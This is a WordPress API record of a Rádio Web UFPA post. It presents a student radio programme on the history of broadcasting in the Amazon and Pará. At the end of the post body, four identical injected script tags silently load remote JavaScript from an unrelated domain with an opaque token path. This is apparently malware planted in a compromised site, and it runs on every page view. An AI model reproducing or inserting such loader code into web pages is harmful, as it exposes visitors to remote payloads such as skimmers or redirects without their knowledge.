{"id":13914,"date":"2023-08-30T19:35:22","date_gmt":"2023-08-30T22:35:22","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=13914"},"modified":"2025-10-21T12:56:09","modified_gmt":"2025-10-21T15:56:09","slug":"ondas-do-norte","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/","title":{"rendered":"Ondas do Norte"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Ondas do Norte&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/ESPACO-EXPERIMENTAL-ONDAS-DO-NORTE-RADIO-PORAO-2023.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Ondas do Norte \u00e9 o terceiro programa da s\u00e9rie Ondas do R\u00e1dio em destaque no <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/espaco-experimental\/\" target=\"_blank\" rel=\"noreferrer noopener\">Espa\u00e7o Experimental<\/a>. Os trabalhos foram realizados durante a atividade curricular dos alunos e alunas da <a href=\"https:\/\/www.instagram.com\/facomufpa\/?hl=pt-br\" target=\"_blank\" rel=\"noreferrer noopener\">Faculdade de Comunica\u00e7\u00e3o da UFPA<\/a>, para a disciplina Introdu\u00e7\u00e3o ao Radiojornalismo, ministrada pela professora Net\u00edlia Seixas.&nbsp;<\/p>\n\n\n\n<p>No Ondas do Norte, os estudantes Isabella Leite, Lucas Lorran, Lucas Germiniani, Camila Ros\u00e1rio e Jo\u00e3o Vitor Uch\u00f4a apresentam um panorama geral da hist\u00f3ria do r\u00e1dio na Amaz\u00f4nia e no Par\u00e1. Assim, o programa \u00e9 intercalado por diversas curiosidades sobre esse viajante pioneiro da comunica\u00e7\u00e3o de massa na d\u00e9cada de 1930.<\/p>\n\n\n\n<p>Os estudantes relatam que o primeiro contato dos povos amaz\u00f4nicos com a radiodifus\u00e3o s\u00f3 ocorreu cinco anos depois da primeira transmiss\u00e3o de r\u00e1dio no Brasil. Ao todo, foram 42 anos entre o primeiro e o \u00faltimo estado a ter uma emissora em territ\u00f3rio nortista. O pioneiro foi o Amazonas, em 1927, com a r\u00e1dio Voz de Manaus, um sonho do ent\u00e3o governador Ephig\u00eanio Salles de reviver o ciclo da borracha por meio da radiodifus\u00e3o.<\/p>\n\n\n\n<p>E no Par\u00e1? Voc\u00ea sabe quando o r\u00e1dio chegou e quem foi respons\u00e1vel pela implanta\u00e7\u00e3o do sistema no estado? O Ondas do Norte destaca que a era do r\u00e1dio em solo paraense come\u00e7ou 100 anos depois do lan\u00e7amento do primeiro jornal impresso no Par\u00e1. A pioneira em a\u00e7\u00e3o foi a PRC-5, que \u00e9 a atual R\u00e1dio Clube. Inspirados pela R\u00e1dio Clube de Pernambuco, os amigos Edgar Proen\u00e7a (jornalista), Roberto Camelier (advogado), e Eriberto Pio (telegrafista) fundaram, em Bel\u00e9m, a r\u00e1dio PRC-5, em 1928.<\/p>\n\n\n\n<p>Assim, enquanto os jornais impressos ganhavam cada vez mais espa\u00e7os nos centros urbanos, o r\u00e1dio avan\u00e7ava para o interior do Estado. Um programa que se destacava na \u00e9poca era o chamado Mensageiro para o Interior que transmitia informa\u00e7\u00f5es que eram repassadas \u201cde boca em boca\u201d at\u00e9 chegar aos verdadeiros destinat\u00e1rios que ainda n\u00e3o possu\u00edam r\u00e1dio e moravam pelas \u00e1reas mais afastadas das grandes cidades. <\/p>\n\n\n\n<p>J\u00e1 na \u00e1rea esportiva, a R\u00e1dio Clube do Par\u00e1 foi a primeira emissora do Norte a transmitir uma partida de futebol, em 1935. Durante a fase de ouro do r\u00e1dio na d\u00e9cada de 1940, a Clube tamb\u00e9m come\u00e7ou a operar em Onda Tropical passando a ser ouvida em toda a regi\u00e3o amaz\u00f4nica e at\u00e9 fora do Pa\u00eds, ganhando o carinhoso apelido de \u201cA poderosa\u201d.<\/p>\n\n\n\n<p>Quer saber um pouco mais sobre a hist\u00f3ria, as contribui\u00e7\u00f5es e a import\u00e2ncia da radiodifus\u00e3o para a comunica\u00e7\u00e3o e o desenvolvimento da Amaz\u00f4nia, ent\u00e3o n\u00e3o perca o programa Ondas do Norte, mais um epis\u00f3dio da s\u00e9rie Ondas do R\u00e1dio em detaque no Espa\u00e7o Experimental.<\/p>\n\n\n\n<p>O Ondas do Norte \u00e9 uma produ\u00e7\u00e3o dos estudantes da turma de jornalismo 2021: Isabella Leite, Lucas Lorran, Lucas Germiniani, Jo\u00e3o Vitor Uch\u00f4a e&nbsp; Camila Ros\u00e1rio, sob a orienta\u00e7\u00e3o da professora Net\u00edlia Seixas.&nbsp;<\/p>\n\n\n\n<p>Reportagem: Denily Carvalho<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Ondas do Norte\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\" aria-label=\"Read more about Ondas do Norte\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-13914","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ondas do Norte - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ondas do Norte - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-08-30T22:35:22+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:56:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"400\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Ondas do Norte\",\"datePublished\":\"2023-08-30T22:35:22+00:00\",\"dateModified\":\"2025-10-21T15:56:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\"},\"wordCount\":535,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\",\"name\":\"Ondas do Norte - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1\",\"datePublished\":\"2023-08-30T22:35:22+00:00\",\"dateModified\":\"2025-10-21T15:56:09+00:00\",\"description\":\"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1\",\"width\":400,\"height\":300,\"caption\":\"Ondas do Norte\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ondas do Norte\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ondas do Norte - Radio Web UFPA","description":"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/","og_locale":"pt_BR","og_type":"article","og_title":"Ondas do Norte - Radio Web UFPA","og_description":"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-08-30T22:35:22+00:00","article_modified_time":"2025-10-21T15:56:09+00:00","og_image":[{"width":400,"height":300,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Ondas do Norte","datePublished":"2023-08-30T22:35:22+00:00","dateModified":"2025-10-21T15:56:09+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/"},"wordCount":535,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/","name":"Ondas do Norte - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","datePublished":"2023-08-30T22:35:22+00:00","dateModified":"2025-10-21T15:56:09+00:00","description":"Ondas do Norte faz parte da s\u00e9rie Ondas do R\u00e1dio em destaque no Espa\u00e7o Experimental. Trabalho realizado na Faculdade de Comunica\u00e7\u00e3o da UFPA","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","width":400,"height":300,"caption":"Ondas do Norte"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/ondas-do-norte\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Ondas do Norte"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/08\/igran_emissora.jpg?fit=400%2C300&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3Cq","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13914","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=13914"}],"version-history":[{"count":13,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13914\/revisions"}],"predecessor-version":[{"id":17776,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13914\/revisions\/17776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13919"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=13914"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=13914"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=13914"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}